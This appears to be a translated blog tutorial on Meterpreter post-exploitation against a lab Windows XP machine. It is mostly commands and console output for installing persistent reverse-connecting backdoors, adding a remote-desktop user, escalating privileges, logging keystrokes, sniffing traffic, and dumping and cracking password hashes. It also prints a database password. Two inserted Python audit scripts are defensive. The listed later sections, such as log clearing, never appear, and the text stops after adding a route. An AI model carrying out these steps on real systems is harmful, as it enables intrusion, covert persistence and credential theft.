A First Look at Meterpreter - emaste_r
- What Meterpreter is
- Common Meterpreter commands
- Meterpreter and the post-exploitation modules
- Backdoors
  - 1 Test whether it is a virtual machine
  - 2 Install a backdoor, method one
  - 3 Install a backdoor, method two
  - 4 getgui 3389
- Privilege escalation
  - 1 Straightforward: getsystem
  - 2 MS10-073 keyboard layout file privilege escalation vulnerability
  - 3 MS10-092 Windows Task Scheduler service privilege escalation vulnerability
- Stealing information
  - 1 dumplink: steal records of recent system activity, accessed files, etc.
  - 2 Keystroke logging
  - 3 enum_applications: patches, updates, antivirus, etc.
- Stealing system passwords
  - 1 sniffer: network sniffing
  - 2 IE cache
  - 3 Grabbing and cracking hashes
- Internal network penetration
  - 1 Adding a route
  - 2 Port 445 scan: file sharing / printer sharing service
  - 3 psexec against port 445: SMB hash passing
  - 4 MS10-046 + MS08-068: build your own SMB server and wait for the fish to bite
- Destroying evidence
  - 1 clearev
  - 2 timestomp
Before reading this article, please read 《初探BEEF》 (A First Look at BeEF) first.
===================================================
1. What is Meterpreter?
How an ordinary shell payload works:
- (1) The payload opens a port A on the victim machine
- (2) A command-line terminal is bound to A
- (3) The attacker connects to A and thereby interacts with the victim machine
Its drawbacks:
- (1) It creates a new process, which is easy to spot
- (2) Attacker and victim talk by sending data through that port, which is easy for an IDS to spot
- (3) The victim process may be chroot'ed (change root directory), limiting its privileges
How Meterpreter does it instead:
- (1) Purely in memory; every API it needs to call is hooked
- (2) XOR encryption in 16-byte groups, transported inside SSL
- In short: hard to detect, and cross-platform portability and extensibility are all solid..
2. Common Meterpreter commands
- background # put meterpreter into the background
- sessions -i index # interact with a session; index is the session number
- quit # exit the session
- shell # get a console on the target
- irb # open a ruby terminal
File system commands:
- cat c:\\boot.ini # view file contents
- getwd # show the current working directory
- upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
- download nimeia.txt /root/Desktop/ # download a file to the local machine
- edit c:\\boot.ini # edit a file
- search -d c:\\windows -f *.mdb # search for files
Network commands:
- ipconfig / ifconfig # show network interface information
- portfwd add -l 5555 -p 3389 -r 192.168.198.129 # port forwarding: listen locally on 5555 and forward to the target's 3389
- root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
- route # show the routing table
System commands:
- ps # list active processes
- migrate pid # migrate the Meterpreter session into the process with that pid
- execute -H -i -f cmd.exe # create a new process cmd.exe; -H hidden, -i interactive
- getpid # show the current process's pid
- kill pid # kill a process
- getuid # show the current user
- sysinfo # show target system information such as hostname and operating system
- shutdown # shut the machine down
Having written this far, let's rank the commands:
First place: ps + migrate. We got in through IE; what if IE gets closed? If the victim never visits that hooked page again, we could never get a shell again.. So migrate early into another process space, such as Explorer.exe, which they are unlikely to close..
Second place: execute, because it gives us cmd.exe.
Third place: portfwd, port forwarding; in practice you nearly always need to forward~
Readers, if you disagree with my view, leave a comment and share yours~~
3. Meterpreter and the post-exploitation modules
- AUX auxiliary modules: information gathering
- Exploit modules: exploitation
- Post-exploitation modules: host control and extended attacks, supporting the whole penetration-testing process
Meterpreter is one Metasploit payload, just a far more powerful one. Its relationship to the post-exploitation modules: the former is the channel through which the latter are carried out.
The post-exploitation modules are written in Ruby, and the target very likely has no Ruby interpreter, so how does that work?
4. Backdoors
1) Test whether it is a virtual machine:
- meterpreter > run post/windows/gather/checkvm
- [*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....
- [*] This is a VMware Virtual Machine
If it is a VM, enthusiasm drops.. it may well be a honeypot..
2) Install a backdoor, method one:
- meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108
- [*] Running Persistance Script
- [*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
- [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
- [*] Persistent agent script is 609628 bytes long
- [+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
- [*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
- [+] Agent executed with PID 1888
- [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
- [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
It then creates a .vbs file under C:/windows/Temp/ on the target, which is launched at boot.
The .vbs above really exists and the autostart entry is there too, but there is just this:
Searching Baidu for this problem, every hit says the symptom means you have been infected by a trojan, and then teaches you to delete things and remove autostart entries.. Why is something produced by meterpreter so easily exposed on XP? Digging a bit: NTVDM is part of the Win16 virtual machine, the VM Windows uses for backwards compatibility with 16-bit programs. But why does it come up here? I'll leave this as an open question; passing experts, if you see this, could you answer it for me?
3) Install a backdoor, method two:
- meterpreter > run metsvc
- [*] Creating a meterpreter service on port 31337
- [*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
- [*] >> Uploading metsrv.dll...
- [*] >> Uploading metsvc-server.exe...
- [*] >> Uploading metsvc.exe...
- [*] Starting the service...
- * Installing service metsvc
- * Starting service
- Service metsvc successfully installed.
- meterpreter >
Listening on 31337; it uploaded three DLL files and the target now has one more auto-starting service: Meterpreter...
Then connect:
- msf exploit(handler) > use exploit/multi/handler
- msf exploit(handler) > set payload windows/metsvc_bind_tcp
- payload => windows/metsvc_bind_tcp
- msf exploit(handler) > set RHOST 192.168.0.111
- RHOST => 192.168.0.111
- msf exploit(handler) > set LPORT 31337
- LPORT => 31337
- msf exploit(handler) > exploit
- [*] Started bind handler
- [*] Starting the payload handler...
- [*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800
- meterpreter >
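Both installation methods leave a footprint a defender can audit: method one writes a .vbs to C:\WINDOWS\TEMP and registers it under the HKLM Run key with a random value name, method two installs the metsvc service out of a temp directory. The script below is an added example, not code from the post or from Metasploit: it parses constructed `reg query` output and a constructed service list and flags entries that execute from a temp directory, run through a script host, or carry a random-looking name; the thresholds in looks_random are an assumption of the example.

```python
r"""Autostart audit for the footprints of `run persistence` and `run metsvc`.

Added example, not code from the post or from Metasploit. Input is constructed
`reg query` output for the HKLM Run key plus a constructed (name, binary path)
service list; on a real host the same text comes from `reg query` / `sc qc`
or Sysinternals Autoruns.
"""
import re
from dataclasses import dataclass, field

TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
SCRIPT_EXTS = (".vbs", ".js", ".hta")
# One value line as printed by `reg query`: "    <name>    REG_SZ    <data>"
REG_LINE_RE = re.compile(r"^\s+(.+?)\s+(REG_[A-Z_]+)\s+(.*)$")


@dataclass
class Finding:
    source: str                 # "run" (registry Run key) or "service"
    name: str
    command: str
    reasons: list = field(default_factory=list)


def looks_random(name: str) -> bool:
    """Heuristic (assumption of this example): short names with many
    upper/lower case flips, like the post's tTCmdZkXLp, are machine-generated."""
    letters = [c for c in name if c.isalpha()]
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return 8 <= len(letters) <= 16 and flips >= 4


def analyse_entry(source: str, name: str, command: str):
    """Return a Finding for a suspicious autostart entry, or None."""
    reasons = []
    cmd = command.lower()
    if TEMP_DIR_RE.search(command):
        reasons.append("executes from a temp directory")
    if cmd.endswith(SCRIPT_EXTS) or any(h in cmd for h in SCRIPT_HOSTS):
        reasons.append("script-host autostart")
    if looks_random(name):
        reasons.append("random-looking entry name")
    return Finding(source, name, command, reasons) if reasons else None


def parse_reg_query(text: str):
    """Yield (value name, data) for each value line of `reg query` output."""
    for line in text.splitlines():
        m = REG_LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(3).strip()


def audit(reg_output: str, services) -> list:
    """Audit Run-key values and service binaries; return the findings in order."""
    findings = []
    for name, data in parse_reg_query(reg_output):
        f = analyse_entry("run", name, data)
        if f:
            findings.append(f)
    for name, path in services:
        f = analyse_entry("service", name, path)
        if f:
            findings.append(f)
    return findings


# Constructed `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` output,
# with the post's persistence entry mixed in among benign ones.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    tTCmdZkXLp    REG_SZ    C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
"""

# Constructed service list: (service name, binary path), metsvc as in the post.
SAMPLE_SERVICES = [
    ("VMTools", r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"),
    ("metsvc", r"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm\metsvc.exe"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_REG_QUERY, SAMPLE_SERVICES):
        print(f"[{f.source}] {f.name}: {f.command} -> {'; '.join(f.reasons)}")
```

Run against the sample data it reports the persistence value (three reasons) and the metsvc binary (temp directory) and stays quiet on the VMware and ctfmon entries; the same checks map directly onto an Autoruns export.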
4) getgui + 3389
- meterpreter > run getgui -u aa -p 123qwe
If nothing went wrong, the user aa with password 123qwe has been added and put into those two groups..
Then:
- msf exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389
Connected~
If you are on an internal network, forward the port first:
- portfwd add -l 5555 -p 3389 -r 192.168.0.111 # port forwarding: listen locally on 5555 and forward the target's 3389 to it
- root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
5. Privilege escalation
1) Straightforward: getsystem
- meterpreter > getsystem -h
- Usage: getsystem [options]
- Attempt to elevate your privilege to that of local system.
- OPTIONS:
- -h Help Banner.
- -t <opt> The technique to use. (Default to '0').
- 0 : All techniques available
- 1 : Service - Named Pipe Impersonation (In Memory/Admin)
- 2 : Service - Named Pipe Impersonation (Dropper/Admin)
- 3 : Service - Token Duplication (In Memory/Admin)
- 4 : Exploit - KiTrap0D (In Memory/User)
- meterpreter >
getsystem tries four techniques to escalate; (In Memory/Admin) denotes the required environment and starting privilege.
- meterpreter > getsystem
- ...got system (via technique 1).
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- meterpreter >
SYSTEM is the highest privilege..
2) MS10-073 keyboard layout file privilege escalation vulnerability
- meterpreter > background
- [*] Backgrounding session 5...
- msf > set session 5
- session => 5
- msf > use post/windows/escalate/ms10_073_kbdlayout
- msf post(ms10_073_kbdlayout) > exploit
- [*] Attempting to elevate PID 0x278
- [*] {"GetLastError"=>0, "return"=>1548}
- [*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom ..
- [*] Allocated 0x8000 bytes of memory @ 0x60630000
- [*] Initialized RWX buffer ...
- [*] Current Keyboard Layout: 0x8040804
- [*] Patched in syscall wrapper @ 0x60631000
- [*] Successfully executed syscall wrapper!
- [*] Attempting to cause the ring0 payload to execute...
- [*] SendInput: {"GetLastError"=>5, "return"=>1}
- [*] Post module execution completed
- msf post(ms10_073_kbdlayout) >
3) MS10-092 Windows Task Scheduler service privilege escalation vulnerability
- msf post(ms10_073_kbdlayout) > back
- msf > set session 5
- session => 5
- msf > use post/windows/escalate/ms10_092_schelevator
- msf post(ms10_092_schelevator) > exploit
- [-] Windows XP (Build 2600, Service Pack 1). is not vulnerable.
- [*] Post module execution completed
- msf post(ms10_092_schelevator) >
Alas, I can shamefully only go after XP SP1.. how little ambition..
6. Stealing information
1) dumplink: steal records of recent system activity, accessed files and so on
- meterpreter > run post/windows/gather/dumplinks
- [*] Running module against EMASTER-8G5WOLV
- [*] Running as SYSTEM extracting user list...
- [*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
- [*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk.
- [*] No Recent Office files found for user Administrator. Nothing to do.
- [*] No Recent directory found for user LocalService. Nothing to do.
- [*] No Recent Office files found for user LocalService. Nothing to do.
- [*] No Recent directory found for user NetworkService. Nothing to do.
- [*] No Recent Office files found for user NetworkService. Nothing to do.
2) Keystroke logging
- meterpreter > keyscan_start
- Starting the keystroke sniffer...
- meterpreter > keyscan_dump
- Dumping captured keystrokes...
- dir <Return> cd <Ctrl> <LCtrl> zhuomian1 <Back> <Back> <Back> <Back> 11 <Back> <Back> zhuo <Return> =-1 <Tab> <Return> <CapsLock> dir <Return> <Back> <Back> <Back> <Back> <Ctrl> <LCtrl> dir <CapsLock> <Back> <Back> r <Back> ir <Return>
- meterpreter > keyscan_dump
- Dumping captured keystrokes...
- <Return> <Return> <N5> <N6> <N4> <N5> <N4> <N5> <N9> <N1> <N3> xugyabq <Back> <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl> <LCtrl> s <Back> <Back> <Back> <Back> emaster <Left> -- <Back> <Back> _ <Ctrl> <LCtrl> s
- meterpreter > keyscan_stop
- Stopping the keystroke sniffer...
- meterpreter >
3) enum_applications: patches, updates, antivirus, etc.
- meterpreter > run post/windows/gather/enum_applications
- [*] Enumerating applications installed on EMASTER-8G5WOLV
- Installed Applications
- ======================
- Name Version
- ---- -------
- Adobe Flash Player 11 ActiveX 11.9.900.152
- VMware Tools 8.1.4.11056
- WebFldrs XP 9.50.6513
- Windows Installer 3.1 (KB893803) 3.1
- [*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt
- meterpreter >
7. Stealing system passwords
1) sniffer: network sniffing
- meterpreter > use sniffer
- Loading extension sniffer...success.
- meterpreter > sniffer_interfaces
- 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
- meterpreter > sniffer_interfaces 1
- 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
- meterpreter > sniffer_start 1
- [*] Capture started on interface 1 (50000 packet buffer)
- meterpreter > sniffer_dump 1 /tmp/xpsp1.cap
- [*] Flushing packet capture buffer for interface 1...
- [*] Flushed 355 packets (101378 bytes)
- [*] Downloaded 100% (101378/101378)...
- [*] Download completed, converting to PCAP...
- [*] PCAP file written to /tmp/xpsp1.cap
- meterpreter > sniffer_stop 1
- [*] Capture stopped on interface 1
- [*] There are 157 packets (40891 bytes) remaining
- [*] Download or release them using 'sniffer_dump' or 'sniffer_release'
- meterpreter >
Then in a shell type wireshark and load the /tmp/xpsp1.cap capture:
2) IE cache
- meterpreter > run post/windows/gather/enum_ie
- [*] IE Version: 6.0.2800.1106
- [-] This module will only extract credentials for >= IE7
- [*] Retrieving history.....
- File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat
- [*] Retrieving cookies.....
- File: C:\Documents and Settings\LocalService\Cookies\index.dat
- [*] Looping through history to find autocomplete data....
- [-] No autocomplete entries found in registry
- [*] Looking in the Credential Store for HTTP Authentication Creds...
- meterpreter >
It says here this only works for IE7 and above..
3) Grabbing and cracking hashes
- msf auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml
- [*] exec: cat /opt/metasploit/config/database.yml
- #
- # These settings are for the database used by the Metasploit Framework
- # unstable tree included in this installer, not the commercial editions.
- #
- development:
- adapter: "postgresql"
- database: "msf3dev"
- username: "msf3"
- password: "4bfedfc2"
- port: 7337
- host: "localhost"
- pool: 256
- timeout: 5
- production:
- adapter: "postgresql"
- database: "msf3dev"
- username: "msf3"
- password: "4bfedfc2"
- port: 7337
- host: "localhost"
- pool: 256
- timeout: 5
- msf auxiliary(jtr_crack_fast) > db_connect msf3:4bfedfc2@127.0.0.1:7337/msf3dev
Connection format: db_connect username:password@localhost:port/database_name
All of these values are in /opt/metasploit/config/database.yml. If you run into a gem install pg error, it is a configuration problem:
- vi /opt/metasploit/msf3/msfconsole
- change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby in the top of msfconsole.
For why this change is made, see the linked write-up on the fix. With that the database is set up. One more remark: every time msf starts you have to db_connect by hand..
Ordinary method one:
- msf exploit(handler) > use post/windows/gather/hashdump
- msf post(hashdump) > set session 1
- session => 1
- msf post(hashdump) > exploit
- [*] Obtaining the boot key...
- [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
- [*] Obtaining the user list and keys...
- [*] Decrypting user keys...
- [*] Dumping password hashes...
- Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- [*] Post module execution completed
Ordinary method two:
- meterpreter > hashdump
- Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- meterpreter >
But this approach has its downsides:
- ineffective without SYSTEM privileges..
- unstable on Win7, Vista and Win2008..
- fails under UAC (User Account Control)..
The smart way:
- meterpreter > run post/windows/gather/smart_hashdump
- [*] Running module against EMASTER-8G5WOLV
- [*] Hashes will be saved to the database if one is connected.
- [*] Hashes will be saved in loot in JtR password file format to:
- [*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt
- [*] Dumping password hashes...
- [*] Running as SYSTEM extracting hashes from registry
- [*] Obtaining the boot key...
- [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
- [*] Obtaining the user list and keys...
- [*] Decrypting user keys...
- [*] Dumping password hashes...
- [+] Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [+] HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- [+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- meterpreter >
The smart flow (treat it as extended reading):
- check the current privileges and the OS type
- check whether the host is a domain controller
- read the hashes from the registry; if that fails, inject into the LSASS process; if it is a domain controller, inject into LSASS directly
- on Win2008 with an administrator-level session, try getsystem; if LSASS cannot be injected as SYSTEM, first migrate into a SYSTEM process, then inject into LSASS
- on Win7/Vista with UAC off and an administrator-level session, try getsystem, then read the hashes
- on Win2003/XP/2000, getsystem directly, then read the hashes
Check the database:
- msf auxiliary(jtr_crack_fast) > creds
- Credentials
- ===========
- host port user pass type active?
- ---- ---- ---- ---- ---- -------
- 192.168.0.111 445 guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 smb_hash true
- 192.168.0.111 445 administrator 123qwe password true
- 192.168.0.111 445 guest password true
- 192.168.0.111 445 administrator daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011 smb_hash true
- 192.168.0.111 445 helpassistant 866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb smb_hash true
- 192.168.0.111 445 support_388945a0 aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881 smb_hash true
- [*] Found 6 credentials.
- msf auxiliary(jtr_crack_fast) >
Crack with John the Ripper:
It is an open-source cracker bundling several algorithms, aimed at weak Unix/Linux (and, of course, Windows) passwords; luckily msf integrates this big gun..
- msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
- msf auxiliary(jtr_crack_fast) > exploit
- [*] Seeded the password database with 6 words...
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:06 DONE (Sat Dec 7 14:36:28 2013) c/s: 5791K trying: WIT1900 - ZZZ1900
- Warning: passwords printed above might be partial and not be all those cracked
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: 123QWE (cred_1)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- Warning: mixed-case charset, but the current hash type is case-insensitive;
- some candidate passwords may be unnecessarily tried more than once.
- guesses: 1 time: 0:00:00:08 DONE (Sat Dec 7 14:36:37 2013) c/s: 18967K trying: ||V} - |||}
- Warning: passwords printed above might be partial and not be all those cracked
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: Remaining 3 password hashes with no different salts
- [*] Output: (cred_2)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:36:37 2013) c/s: 1234K trying: 89093 - 89092
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: Remaining 2 password hashes with no different salts
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- [*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- [*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- [*]
- [*] 3 password hashes cracked, 2 left
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:20 DONE (Sat Dec 7 14:36:58 2013) c/s: 10089K trying: zydeco1900 - 123qwe1900
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: 123qwe (cred_1)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:09 DONE (Sat Dec 7 14:37:07 2013) c/s: 17311K trying: |||}
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: Remaining 3 password hashes with no different salts
- [*] Output: (cred_2)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:37:08 2013) c/s: 1388K trying: 89030 - 89092
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: Remaining 2 password hashes with no different salts
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- [*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- [*]
- [*] 2 password hashes cracked, 2 left
- [+] Cracked: administrator:123qwe (192.168.0.111:445)
- [+] Cracked: guest: (192.168.0.111:445)
- [*] Auxiliary module execution completed
- msf auxiliary(jtr_crack_fast) >
As you can see, the weak password 123qwe I set on XP has been cracked.. but jtr can do nothing about strong passwords..
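What made the John run above fast is visible in the hash dump itself, and the same format can be audited before an attacker gets to it. The script below is an added example, not code from the post or from Metasploit: it parses pwdump-style lines like those printed by hashdump, flags accounts whose LM hash is actually stored (the Administrator line above; LM is case-insensitive, which is why John printed 123QWE), accounts with an empty password (Guest), and accounts that share an NT hash. The backup_op line is constructed to exercise the shared-password check. The host-side mitigation is the NoLMHash policy (or passwords of 15+ characters), which turns the LM field into the blank sentinel, as it already is for SUPPORT_388945a0.

```python
"""Audit a pwdump-format hash dump for the weaknesses the John run exploited.

Added example, not from the post or from Metasploit. Each line is
user:rid:LM:NT:::. An LM field equal to the empty-password LM hash means no
LM hash is stored (NoLMHash policy or a 15+ character password); an NT field
equal to the empty-password NT hash means the account has no password at all.
"""
import re
from collections import defaultdict

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
PWDUMP_RE = re.compile(
    r"^(?:\[\+\]\s*)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_pwdump(text: str):
    """Yield (user, rid, lm, nt) for every well-formed pwdump line."""
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            yield m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()


def audit_hashes(text: str) -> dict:
    """Map each account name to the list of issues found for it."""
    issues = {}
    users_by_nt = defaultdict(list)
    for user, rid, lm, nt in parse_pwdump(text):
        found = []
        if lm != BLANK_LM:
            # LM = DES over two 7-byte halves of the upper-cased password:
            # crackable case-insensitively, exactly what John did above.
            found.append("LM hash stored: password is at most 14 chars and NoLMHash is off")
        if nt == BLANK_NT:
            found.append("empty password")
        issues[user] = found
        users_by_nt[nt].append(user)
    # NT hashes are unsalted, so identical hashes mean identical passwords.
    for nt, users in users_by_nt.items():
        if nt != BLANK_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                issues[u].append("password shared with: " + others)
    return issues


# The four lines the post's hashdump produced, plus one constructed extra
# (backup_op) that reuses the Administrator NT hash.
SAMPLE_DUMP = """
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
backup_op:1003:aad3b435b51404eeaad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
"""

if __name__ == "__main__":
    for user, found in audit_hashes(SAMPLE_DUMP).items():
        print(f"{user}: {'; '.join(found) if found else 'ok'}")
```

The check is deliberately format-only: no cracking is attempted, the dump already tells you which accounts are exposed to a quick LM attack and which have no password, and a clean run means every LM field is the blank sentinel.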
8. Internal network penetration
1) Adding a route
- meterpreter > run get_local_subnets
- Local subnet: 192.168.0.0/255.255.255.0
- meterpreter > background
- [*] Backgrounding session 1...
- msf auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1
- [*] Route added
- msf auxiliary(jtr_crack_fast) > route print
- Active Routing Table
- ====================
- Subnet Netmask Gateway
- ------ ------- -------
- 192.168.0.0 255.255.255.0 Session 1
